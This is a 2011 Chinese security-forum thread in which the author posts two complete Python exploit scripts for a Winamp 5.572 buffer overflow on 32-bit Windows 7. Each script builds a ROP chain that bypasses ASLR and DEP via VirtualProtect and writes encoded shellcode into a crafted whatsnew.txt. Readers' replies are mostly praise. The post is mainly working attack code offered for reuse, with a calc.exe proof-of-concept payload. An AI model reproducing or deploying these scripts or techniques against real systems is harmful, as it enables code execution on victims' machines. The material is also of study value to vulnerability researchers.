首页
论坛
课程
招聘
[原创]Winamp Overflow Exploit (Win7 ASLR and DEP Bypass)
2011-3-27 16:27 13647

[原创]Winamp Overflow Exploit (Win7 ASLR and DEP Bypass)

2011-3-27 16:27
13647
之前在exploit-db上看到关于winamp的溢出exploit:http://www.exploit-db.com/exploits/14068/,可绕过win7下的aslr和dep保护,不过其只能在64位win7上成功,而我的系统刚好是32位的,因此就自己动手写了一个。由于win7上的ASLR的保护,VirtualProtect函数的地址是非固定,因此必须动态地定位VP函数地址,最初我是借助COMODO主动防御软件上的guard32.dll中的指令来定位VP函数的,但在测试时必须关闭comodo,否则会报缓冲区溢出(comodo还是比较给力的!)。由于这种方法需要安装comodo才会成功,因此后面我又使用原exploit中的方法,在栈中寻找到指向kernel32的指针,再偏移找到VP函数,相对前一种会更稳定更通用些。不过,上面这两种方法在调试状态每次都可成功,而直接运行软件测试的时候,有时会不成功,此时你得多测试几次才行!下面将两份代码帖上,供大家交流探讨。

第一种方法:
#!/usr/bin/python
#Exploit Title: Winamp v5.572 Overflow Exploit (Win7 ASLR and DEP Bypass)
#Date:             2011/3/24
#Author:        riusksk
#Software Link:    http://download.nullsoft.com/winamp/client/winamp5572_full_emusic-7plus_en-us.exe
#Tested on:     Windows 7 x32 QiJian CN
#Badchars:         '\x00\xff\x5c\x2f\x0a\x0d\x20'
#Notes:         1.Replace the original whatsnew.txt with the generated file in Winamp install dir,
#                  2.Start up Winamp, click "Help" => "About Winamp..." => "version history".
print "[+] Winamp_5.572 Overflow Exploit(Win7 ASLR and DEP Bypass) - by riusksk"
print "[+] Building file......"
version = "Winamp 5.572"
rop = "A"*540                  #Offset
rop += "\x1c\x10\x09\x07"     #0x0709101c :  # RETN
rop += "A"*16
#---------put stack pointer in edi & eax -------------
rop += "\xf4\xa8\x3e\x07"     #0x073EA8F4 :  # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN 8     [Module : gen_ff.dll]
rop += "A"*8
rop += "\x86\xe8\x40\x07"     #0x0740E886 :  # MOV EAX,EDI # POP ESI # RETN     [Module : gen_ff.dll]  **
rop += "A"*12
#----------jmp over params------------
rop += "\x20\x50\xa6\x07"     #0x07A65020 :  # ADD ESP,18 # RETN 10     [Module : ml_rg.dll]  **
#-------------locate VirtualProtect() addr------------
# use guard32.dll in COMODO Internet Security to get the pointer where point to VirtualProtect
#1002CA33  -FF25 E8F30310    JMP DWORD PTR DS:[1003F3E8]    [Module : guard32.dll]
# jmp to here
#6FFF04C0   8BFF             MOV EDI,EDI
#6FFF04C2   55               PUSH EBP
#6FFF04C3   8BEC             MOV EBP,ESP
#6FFF04C5  -E9 E64BFF06      JMP kernel32.76FE50B0
# jmp to here
#76FE50B0   5D               POP EBP
#76FE50B1  ^E9 02D0FBFF      JMP
# jmp to here
#76FA20B8  -FF25 1019FA76    JMP DWORD PTR DS:[; KERNELBA.VirtualProtect
rop += "\x33\xca\x02\x10"     #0x1002CA33         [Module : guard32.dll]
#---------set VP param---------
rop += "WWWW" #return address
rop += "XXXX" #lpAddress placeholder
rop += "YYYY" #dwsize placeholder
rop += "ZZZZ" #flNewProtect placeholder
rop += "\xa0\x29\x0f\x07"     # lpflOldProtect (0x070f29a0 is a writable address in nde.dll)
#---------------------Set Param1-----------------------------
# make esi points to the param1 (return addr)
rop += "\x68\x4a\xb7\x07"     #0x07B74A68 :  # PUSH EDI # POP ESI # RETN 4     [Module : pmp_ipod.dll]  **  
rop += "A"*16
# make eax points to nops/shellcode
rop += "\x20\x2c\x75\x07"     #0x07752C20 :  # ADD EAX,240 # RETN     [Module : in_mp3.dll]  **
rop += "A"*4
# param1 = EAX
rop += "\x32\x9d\x68\x07"     #0x07689D32 :  # MOV DWORD PTR DS:[ESI+20],EAX # POP ESI # RETN     [Module : in_dshow.dll]  **
rop += "A"*4
#---------------------Set Param2-----------------------------
# make esi points to the param2(lpAddress)
rop += "\x68\x4a\xb7\x07"     #0x07B74A68 :  # PUSH EDI # POP ESI # RETN 4     [Module : pmp_ipod.dll]  **  
# increase ESI with 5
rop += "\x82\x55\x40\x07"*5    #0x07405582 :  # INC ESI # RETN     [Module : gen_ff.dll]  **
# wirte eax to param2
rop += "\x32\x9d\x68\x07"     #0x07689D32 :  # MOV DWORD PTR DS:[ESI+20],EAX # POP ESI # RETN     [Module : in_dshow.dll]  **
rop += "A"*4
#---------------------Set Param3-----------------------------
# make esi points to the param3(dwSize)
rop += "\x68\x4a\xb7\x07"     #0x07B74A68 :  # PUSH EDI # POP ESI # RETN 4     [Module : pmp_ipod.dll]  **  
rop += "\x82\x55\x40\x07"*9    #0x07405582 :  # INC ESI # RETN     [Module : gen_ff.dll]  **
# set eax = 0x30C
rop += "\x1a\x10\x09\x07"     #0x0709101A :  # XOR EAX,EAX # RETN      [Module : libsndfile.dll]
rop += "\x45\x35\x10\x08"     #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]
rop +="AAAA"
rop += "\x45\x35\x10\x08"     #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]
rop +="AAAA"
rop += "\x45\x35\x10\x08"     #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]
rop +="AAAA"
# wirte eax to param3
rop += "\x32\x9d\x68\x07"     #0x07689D32 :  # MOV DWORD PTR DS:[ESI+20],EAX # POP ESI # RETN     [Module : in_dshow.dll]  **
rop += "A"*4
#---------------------Set Param4-----------------------------
# make esi points to the param4(flNewProtect)
rop += "\x68\x4a\xb7\x07"     #0x07B74A68 :  # PUSH EDI # POP ESI # RETN 4     [Module : pmp_ipod.dll]  **  
rop += "\x82\x55\x40\x07"*13    #0x07405582 :  # INC ESI # RETN     [Module : gen_ff.dll]  **
# set eax = 0x40
rop += "\x1a\x10\x09\x07"     #0x0709101A :  # XOR EAX,EAX # RETN      [Module : libsndfile.dll]
rop += "\x3a\xd8\x8d\x07"     #0x078DD83A :  # ADD EAX,41 # RETN       [Module : ml_disc.dll]
rop += "\xec\x11\x09\x07"     #0x070911EC :  # DEC EAX # RETN  [Module : libsndfile.dll]
# wirte eax to param3
rop += "\x32\x9d\x68\x07"     #0x07689D32 :  # MOV DWORD PTR DS:[ESI+20],EAX # POP ESI # RETN     [Module : in_dshow.dll]  **
rop += "A"*4
#-------------------call VirtualProtect()-----------------
# make edi points to callVP
rop += "\x40\x4e\x95\x07"*28    #0x07954E40 :  # INC EDI # RETN     [Module : ml_local.dll]  **
rop += "\x86\xe8\x40\x07"    #0x0740E886 :  # MOV EAX,EDI # POP ESI # RETN     [Module : gen_ff.dll]  **
rop += "A"*4
rop += "\xca\x6d\x5c\x07"    #0x075C6DCA :  # XCHG EAX,ESP # RETN     [Module : gen_ml.dll]  **
nops = "\x90"*500
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\xff\x5c\x2f\x0a\x0d\x20' -t perl
# 312 bytes shellcode
shellcode = ("\xbb\xd2\xaa\xfa\x33\x31\xc9\xb1\x33\xdb\xd3\xd9\x74\x24" +
"\xf4\x5e\x83\xc6\x04\x31\x5e\x0b\x03\x5e\xd9\x48\x0f\xcf" +
"\x35\x05\xf0\x30\xc5\x76\x78\xd5\xf4\xa4\x1e\x9d\xa4\x78" +
"\x54\xf3\x44\xf2\x38\xe0\xdf\x76\x95\x07\x68\x3c\xc3\x26" +
"\x69\xf0\xcb\xe5\xa9\x92\xb7\xf7\xfd\x74\x89\x37\xf0\x75" +
"\xce\x2a\xfa\x24\x87\x21\xa8\xd8\xac\x74\x70\xd8\x62\xf3" +
"\xc8\xa2\x07\xc4\xbc\x18\x09\x15\x6c\x16\x41\x8d\x07\x70" +
"\x72\xac\xc4\x62\x4e\xe7\x61\x50\x24\xf6\xa3\xa8\xc5\xc8" +
"\x8b\x67\xf8\xe4\x06\x79\x3c\xc2\xf8\x0c\x36\x30\x85\x16" +
"\x8d\x4a\x51\x92\x10\xec\x12\x04\xf1\x0c\xf7\xd3\x72\x02" +
"\xbc\x90\xdd\x07\x43\x74\x56\x33\xc8\x7b\xb9\xb5\x8a\x5f" +
"\x1d\x9d\x49\xc1\x04\x7b\x3c\xfe\x57\x23\xe1\x5a\x13\xc6" +
"\xf6\xdd\x7e\x8d\x09\x6f\x05\xe8\x09\x6f\x06\x5b\x61\x5e" +
"\x8d\x34\xf6\x5f\x44\x71\x08\x2a\xc5\xd0\x80\xf3\x9f\x60" +
"\xcd\x03\x4a\xa6\xeb\x87\x7f\x57\x08\x97\xf5\x52\x55\x1f" +
"\xe5\x2e\xc6\xca\x09\x9c\xe7\xde\x69\x43\x7b\x82\x43\xe6" +
"\xfb\x21\x9c\xe2")
expfile = open('whatsnew.txt','w')
expfile.write(version + rop + nops + shellcode)
print "[+] whatsnew.txt generated."
expfile.close()

测试结果,注意比较启动前后的时间:
重启前:


重启后:


第二种方法:

#!/usr/bin/python
#Exploit Title: Winamp v5.572 Overflow Exploit (Win7 ASLR and DEP Bypass)
#Date:             2011/3/24
#Author:        riusksk
#Software Link:    http://download.nullsoft.com/winamp/client/winamp5572_full_emusic-7plus_en-us.exe
#Tested on:     Windows 7 x32 QiJian CN
#Badchars:         '\x00\xff\x5c\x2f\x0a\x0d\x20'
#Notes:         1.Replace the original whatsnew.txt with the generated file in Winamp install dir,
#                  2.Start up Winamp, click "Help" => "About Winamp..." => "version history".
print "[+] Winamp_5.572 Overflow Exploit(Win7 ASLR and DEP Bypass) - by riusksk"
print "[+] Building file......"
version = "Winamp 5.572"
rop = "A"*540                  #Offset
rop += "\x1c\x10\x09\x07"     #0x0709101c :  # RETN
rop += "A"*16
#---------put stack pointer in edi & eax -------------
rop += "\xf4\xa8\x3e\x07"     #0x073EA8F4 :  # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN 8     [Module : gen_ff.dll]
rop += "A"*8
rop += "\x86\xe8\x40\x07"     #0x0740E886 :  # MOV EAX,EDI # POP ESI # RETN     [Module : gen_ff.dll]  **
rop += "A"*12
#----------jmp over params------------
rop += "\x20\x50\xa6\x07"     #0x07A65020 :  # ADD ESP,18 # RETN 10     [Module : ml_rg.dll]  **
#---------set VP param---------
rop += "VPVP" #VirtualProtect()
rop += "WWWW" #return address
rop += "XXXX" #lpAddress placeholder
rop += "YYYY" #dwsize placeholder
rop += "ZZZZ" #flNewProtect placeholder
rop += "\xa0\x29\x0f\x07"     # lpflOldProtect (0x070f29a0 is a writable address in nde.dll)
#---------------Grab a kernel32 pointer from the stack--------------------
# kernel32 pointer = stack pointer(rop entry) - 0x3B0
rop += "\x74\x6c\x96\x07"     #0x07966C74 :  # XCHG EAX,EDX # RETN     [Module : ml_local.dll]
rop += "A"*16
rop += "\x20\x2c\x75\x07"     #0x07752C20 :  # ADD EAX,240 # RETN     [Module : in_mp3.dll]  **
rop += "\x45\x35\x10\x08"    #0x08103545 :  # ADD EAX,104 # POP EBP # RETN     [Module : freetype.wac]  **
rop += "A"*4
rop += "\x8c\x8f\x10\x08"    #0x08108F8C :  # ADD EAX,6C # RETN     [Module : freetype.wac]  **
rop += "\xe5\x1f\x36\x08"    #0x08361FE5 :  # SUB EAX,30 # RETN     [Module : jnetlib.w5s]  **
rop += "\x74\x6c\x96\x07"     #0x07966C74 :  # XCHG EAX,EDX # RETN     [Module : ml_local.dll]
rop += "\xb3\x6a\x6c\x07"     #0x076C6AB3 :  # SUB EAX,EDX # RETN      [Module : in_flv.dll]
rop += "\xa7\x41\x11\x07"     #0x071141A7 :  # MOV EAX,DWORD PTR DS:[EAX] # RETN       [Module : tataki.dll]
# eax = kernel32 pointer
#---------------Change kernel32 pointer to VirtualProtect()-----------------
# VirtualProtect addr = kernel32 pointer + 0xA33F
rop += "\x74\x6c\x96\x07"     #0x07966C74 :  # XCHG EAX,EDX # RETN     [Module : ml_local.dll]  eax=0x3B0
rop += "\x45\x35\x10\x08"     #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]    eax=0x4B4
rop +="AAAA"
rop += "\x67\x40\x5b\x07"     #0x075B4067 :  # MOV ECX,EAX # MOV EAX,ECX # RETN        [Module : gen_ml.dll]
rop += "\xfd\x6b\x71\x07"     #0x07716BFD :  # ADD EAX,ECX # RETN     [Module : in_mkv.dll]  **  eax=0x968
rop += "\x67\x40\x5b\x07"     #0x075B4067 :  # MOV ECX,EAX # MOV EAX,ECX # RETN        [Module : gen_ml.dll]
rop += "\xfd\x6b\x71\x07"     #0x07716BFD :  # ADD EAX,ECX # RETN     [Module : in_mkv.dll]  ** eax=0x12d0
rop += "\x67\x40\x5b\x07"     #0x075B4067 :  # MOV ECX,EAX # MOV EAX,ECX # RETN        [Module : gen_ml.dll]
rop += "\xfd\x6b\x71\x07"     #0x07716BFD :  # ADD EAX,ECX # RETN     [Module : in_mkv.dll]  ** eax=0x25a0
rop += "\x67\x40\x5b\x07"     #0x075B4067 :  # MOV ECX,EAX # MOV EAX,ECX # RETN        [Module : gen_ml.dll]
rop += "\xfd\x6b\x71\x07"     #0x07716BFD :  # ADD EAX,ECX # RETN     [Module : in_mkv.dll]  ** eax=0x4b40
rop += "\x67\x40\x5b\x07"     #0x075B4067 :  # MOV ECX,EAX # MOV EAX,ECX # RETN        [Module : gen_ml.dll]
rop += "\xfd\x6b\x71\x07"     #0x07716BFD :  # ADD EAX,ECX # RETN     [Module : in_mkv.dll]  ** eax=0x9680
rop += "\x20\x2c\x75\x07"*4     #0x07752C20 :  # ADD EAX,240 # RETN     [Module : in_mp3.dll]  ** eax=0x9f80
rop += "\x45\x35\x10\x08"     #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]    eax=0xa084
rop +="AAAA"
rop += "\x45\x35\x10\x08"     #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]    eax=0xa188
rop +="AAAA"
rop += "\x45\x35\x10\x08"     #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]    eax=0xa28c
rop +="AAAA"
rop += "\x45\x35\x10\x08"     #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]    eax=0xa390
rop +="AAAA"
rop += "\xca\x74\x33\x08"    #0x083374CA :  # ADD EAX,10 # RETN     [Module : jnetlib.w5s]  ** eax=0xA3A0
rop += "\x08\x13\x8d\x07"     #0x078D1308 :  # SUB EAX,41 # RETN       [Module : ml_disc.dll] eax=0xA35F
rop += "\xc6\xd7\x8d\x07"     #0x078DD7C6 :  # SUB EAX,20 # RETN       [Module : ml_disc.dll] eax=0xa33f
rop += "\x74\x6c\x96\x07"     #0x07966C74 :  # XCHG EAX,EDX # RETN     [Module : ml_local.dll]
rop += "\x10\x7d\x0b\x07"     #0x070B7D10 :  # ADD EAX,EDX # RETN      [Module : libsndfile.dll]
# eax = VirtualProtect
#---------------------Write VirtualProtect addr to stack-----------------
# make esi points to "VPVP"
rop += "\x68\x4a\xb7\x07"     #0x07B74A68 :  # PUSH EDI # POP ESI # RETN 4     [Module : pmp_ipod.dll]  **  
rop += "\xdb\xd6\x10\x08"*5    #0x0810D6DB :  # DEC ESI # RETN     [Module : freetype.wac]  **
rop += "\x32\x9d\x68\x07"     #0x07689D32 :  # MOV DWORD PTR DS:[ESI+20],EAX # POP ESI # RETN     [Module : in_dshow.dll]  **
rop += "A"*4
#---------------------Set Param1-----------------------------
# make esi points to the param1 (return addr)
rop += "\x68\x4a\xb7\x07"     #0x07B74A68 :  # PUSH EDI # POP ESI # RETN 4     [Module : pmp_ipod.dll]  **  
# make eax points to nops/shellcode
rop += "\xc0\x3c\x32\x08"    #0x08323CC0 :  # MOV EAX,EDI # RETN     [Module : jnetlib.w5s]  **
rop += "A"*4
rop += "\x20\x2c\x75\x07"     #0x07752C20 :  # ADD EAX,240 # RETN     [Module : in_mp3.dll]  **
rop += "\x8c\x8f\x10\x08"     #0x08108F8C :  # ADD EAX,6C # RETN     [Module : freetype.wac]  **
# param1 = EAX
rop += "\x32\x9d\x68\x07"     #0x07689D32 :  # MOV DWORD PTR DS:[ESI+20],EAX # POP ESI # RETN     [Module : in_dshow.dll]  **
rop += "A"*4
#---------------------Set Param2-----------------------------
# make esi points to the param2(lpAddress)
rop += "\x68\x4a\xb7\x07"     #0x07B74A68 :  # PUSH EDI # POP ESI # RETN 4     [Module : pmp_ipod.dll]  **  
# increase ESI with 5
rop += "\x82\x55\x40\x07"*5    #0x07405582 :  # INC ESI # RETN     [Module : gen_ff.dll]  **
# wirte eax to param2
rop += "\x32\x9d\x68\x07"     #0x07689D32 :  # MOV DWORD PTR DS:[ESI+20],EAX # POP ESI # RETN     [Module : in_dshow.dll]  **
rop += "A"*4
#---------------------Set Param3-----------------------------
# make esi points to the param3(dwSize)
rop += "\x68\x4a\xb7\x07"     #0x07B74A68 :  # PUSH EDI # POP ESI # RETN 4     [Module : pmp_ipod.dll]  **  
rop += "\x82\x55\x40\x07"*9    #0x07405582 :  # INC ESI # RETN     [Module : gen_ff.dll]  **
# set eax = 0x30C
rop += "\x1a\x10\x09\x07"     #0x0709101A :  # XOR EAX,EAX # RETN      [Module : libsndfile.dll]
rop += "\x45\x35\x10\x08"     #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]
rop +="AAAA"
rop += "\x45\x35\x10\x08"     #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]
rop +="AAAA"
rop += "\x45\x35\x10\x08"     #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]
rop +="AAAA"
# wirte eax to param3
rop += "\x32\x9d\x68\x07"     #0x07689D32 :  # MOV DWORD PTR DS:[ESI+20],EAX # POP ESI # RETN     [Module : in_dshow.dll]  **
rop += "A"*4
#---------------------Set Param4-----------------------------
# make esi points to the param4(flNewProtect)
rop += "\x68\x4a\xb7\x07"     #0x07B74A68 :  # PUSH EDI # POP ESI # RETN 4     [Module : pmp_ipod.dll]  **  
rop += "\x82\x55\x40\x07"*13    #0x07405582 :  # INC ESI # RETN     [Module : gen_ff.dll]  **
# set eax = 0x40
rop += "\x1a\x10\x09\x07"     #0x0709101A :  # XOR EAX,EAX # RETN      [Module : libsndfile.dll]
rop += "\x3a\xd8\x8d\x07"     #0x078DD83A :  # ADD EAX,41 # RETN       [Module : ml_disc.dll]
rop += "\xec\x11\x09\x07"     #0x070911EC :  # DEC EAX # RETN  [Module : libsndfile.dll]
# wirte eax to param3
rop += "\x32\x9d\x68\x07"     #0x07689D32 :  # MOV DWORD PTR DS:[ESI+20],EAX # POP ESI # RETN     [Module : in_dshow.dll]  **
rop += "A"*4
#-------------------call VirtualProtect()-----------------
# make edi points to callVP
rop += "\x40\x4e\x95\x07"*28    #0x07954E40 :  # INC EDI # RETN     [Module : ml_local.dll]  **
rop += "\x86\xe8\x40\x07"    #0x0740E886 :  # MOV EAX,EDI # POP ESI # RETN     [Module : gen_ff.dll]  **
rop += "A"*4
rop += "\xca\x6d\x5c\x07"    #0x075C6DCA :  # XCHG EAX,ESP # RETN     [Module : gen_ml.dll]  **
nops = "\x90"*500
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\xff\x5c\x2f\x0a\x0d\x20' -t perl
# 312 bytes shellcode
shellcode = ("\xbb\xd2\xaa\xfa\x33\x31\xc9\xb1\x33\xdb\xd3\xd9\x74\x24" +
"\xf4\x5e\x83\xc6\x04\x31\x5e\x0b\x03\x5e\xd9\x48\x0f\xcf" +
"\x35\x05\xf0\x30\xc5\x76\x78\xd5\xf4\xa4\x1e\x9d\xa4\x78" +
"\x54\xf3\x44\xf2\x38\xe0\xdf\x76\x95\x07\x68\x3c\xc3\x26" +
"\x69\xf0\xcb\xe5\xa9\x92\xb7\xf7\xfd\x74\x89\x37\xf0\x75" +
"\xce\x2a\xfa\x24\x87\x21\xa8\xd8\xac\x74\x70\xd8\x62\xf3" +
"\xc8\xa2\x07\xc4\xbc\x18\x09\x15\x6c\x16\x41\x8d\x07\x70" +
"\x72\xac\xc4\x62\x4e\xe7\x61\x50\x24\xf6\xa3\xa8\xc5\xc8" +
"\x8b\x67\xf8\xe4\x06\x79\x3c\xc2\xf8\x0c\x36\x30\x85\x16" +
"\x8d\x4a\x51\x92\x10\xec\x12\x04\xf1\x0c\xf7\xd3\x72\x02" +
"\xbc\x90\xdd\x07\x43\x74\x56\x33\xc8\x7b\xb9\xb5\x8a\x5f" +
"\x1d\x9d\x49\xc1\x04\x7b\x3c\xfe\x57\x23\xe1\x5a\x13\xc6" +
"\xf6\xdd\x7e\x8d\x09\x6f\x05\xe8\x09\x6f\x06\x5b\x61\x5e" +
"\x8d\x34\xf6\x5f\x44\x71\x08\x2a\xc5\xd0\x80\xf3\x9f\x60" +
"\xcd\x03\x4a\xa6\xeb\x87\x7f\x57\x08\x97\xf5\x52\x55\x1f" +
"\xe5\x2e\xc6\xca\x09\x9c\xe7\xde\x69\x43\x7b\x82\x43\xe6" +
"\xfb\x21\x9c\xe2")
expfile = open('whatsnew.txt','w')
expfile.write(version + rop + nops + shellcode)
print "[+] whatsnew.txt generated."
expfile.close()

测试结果:

[公告]请完善个人简历信息,好工作来找你!

上传的附件:
收藏
点赞0
打赏
分享
最新回复 (18)
雪    币: 239
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
天行客 活跃值 2011-3-27 16:36
2
0
微薄上看到,前来围观
雪    币: 288
活跃值: 活跃值 (176)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
riusksk 活跃值 41 2011-3-27 18:15
3
0
期待看雪的30精……
雪    币: 643
活跃值: 活跃值 (11)
能力值: ( LV2,RANK:150 )
在线值:
发帖
回帖
粉丝
StudyRush 活跃值 3 2011-3-27 18:55
4
0
这个必须的,向泉哥学习。
雪    币: 5
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
zhingma 活跃值 2011-3-27 20:51
5
0
打开泉哥的这个教程,感觉ie都受影响,不知道里面那段代码影响ie,我的ie是6.0,进来的时侯定在那里不动了二十秒钟!!
雪    币: 288
活跃值: 活跃值 (176)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
riusksk 活跃值 41 2011-3-27 20:58
6
0
没影响啊!!!
雪    币: 372
活跃值: 活跃值 (139)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
仙果 活跃值 19 2011-3-27 21:49
7
0
我写代码的速度真慢,鄙视自己
雪    币: 288
活跃值: 活跃值 (176)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
riusksk 活跃值 41 2011-3-27 22:23
8
0
calc记得开着,算偏移,呵呵……
然后用notepad++开着,找指令,大概能用上的随便挑几句出来,直接先写上,后面的再走一步算一步,或许这样会快些……
再加上些运气,有时也得那些rop指令够给力才省事啊
雪    币: 421
活跃值: 活跃值 (55)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
tornodo 活跃值 1 2011-3-28 12:52
9
0
真给力,仔细看看
雪    币: 3133
能力值: (RANK:250 )
在线值:
发帖
回帖
粉丝
snowdbg 活跃值 6 2011-3-28 14:20
10
0
rop的人蛋疼,我在想等到他们把所有的DLL都给ASLR之后 会有啥办法
雪    币: 1073
活跃值: 活跃值 (81)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
zhujian 活跃值 2 2011-3-28 14:32
11
0
只能膜拜,无法学习,围观中。
雪    币: 288
活跃值: 活跃值 (176)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
riusksk 活跃值 41 2011-3-28 15:43
12
0
新问题的出现,必然会导致新技术的诞生,这就是前沿!
雪    币: 256
活跃值: 活跃值 (11)
能力值: ( LV13,RANK:270 )
在线值:
发帖
回帖
粉丝
冰雪风谷 活跃值 6 2011-3-28 17:14
13
0
泉哥给力,哈哈
雪    币: 281
活跃值: 活跃值 (10)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
kkmylove 活跃值 2 2011-3-31 20:16
14
0
强帖留名
雪    币: 458
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
wchbest 活跃值 2011-4-7 20:49
15
0
来围观的,看来我的路还是很远的以后要继续了
雪    币: 372
活跃值: 活跃值 (139)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
仙果 活跃值 19 2011-4-8 00:29
16
0
加了一周的班,今天才休息,郁闷
雪    币: 219
活跃值: 活跃值 (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
wufenjack 活跃值 2011-4-8 07:22
17
0
围观学习,提高自己的水平
雪    币: 119
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
刘觐肇 活跃值 2011-6-28 13:58
18
0
不错~~~~~
雪    币: 42
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
莫子 活跃值 2011-6-28 15:30
19
0
路漫漫长。。。得慢慢走。。。谢分享。
游客
登录 | 注册 方可回帖
返回